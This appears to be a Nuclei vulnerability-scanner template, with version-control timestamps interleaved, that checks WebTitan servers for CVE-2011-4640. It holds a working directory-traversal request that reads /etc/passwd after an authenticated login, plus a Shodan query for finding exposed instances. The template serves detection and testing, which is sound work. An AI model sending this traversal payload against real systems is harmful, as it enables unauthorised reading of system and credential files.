2023-10-06 06:06:38 +00:00
id : CVE-2011-4640
info :
2024-02-05 05:49:39 +00:00
name : WebTitan < 3.60 - Local File Inclusion
2023-10-06 06:06:38 +00:00
author : ctflearner
severity : medium
2023-10-08 07:35:56 +00:00
description : |
Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
2023-10-06 06:06:38 +00:00
reference :
- https://www.exploit-db.com/exploits/37943
2024-02-05 05:49:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2011-4640
2023-10-06 06:06:38 +00:00
classification :
2023-10-08 07:35:56 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
2024-03-23 09:28:19 +00:00
cvss-score : 4
2023-10-06 06:06:38 +00:00
cve-id : CVE-2011-4640
cwe-id : CWE-22
cpe : cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
2024-02-05 05:49:39 +00:00
metadata :
max-request : 3
shodan-query : title:"WebTitan"
tags : cve,cve2011,lfi,spamtitan,webtitan,authenticated
2023-10-06 06:06:38 +00:00
http :
2024-02-05 05:49:39 +00:00
- raw :
- |
GET /login-x.php HTTP/1.1
Host : {{Hostname}}
2023-10-08 07:35:56 +00:00
2024-02-05 05:49:39 +00:00
- |
POST /login-x.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
X-Requested-With : XMLHttpRequest
2023-10-06 06:06:38 +00:00
2024-02-05 05:52:31 +00:00
jaction=login&language=en_US&username={{username}}&password={{password}}
2024-02-05 05:49:39 +00:00
- |
GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'contains(body_2, "success\":true")'
- 'contains(body_1, "WebTitan")'
- "regex('root:.*:0:0:', body)"
- 'status_code_3 == 200'
condition : and
2024-02-05 09:57:16 +00:00
# digest: 4a0a00473045022100cd186cd4d289f640e795d17187ff1c6bae1de96bb12faa284508c9c8e7007bbe02201b3379fbbc33d825f18756c1b131458e0e70b95c64d93a6b0da763aa7d2716d4:922c64590222798bb761d5b6d8e72950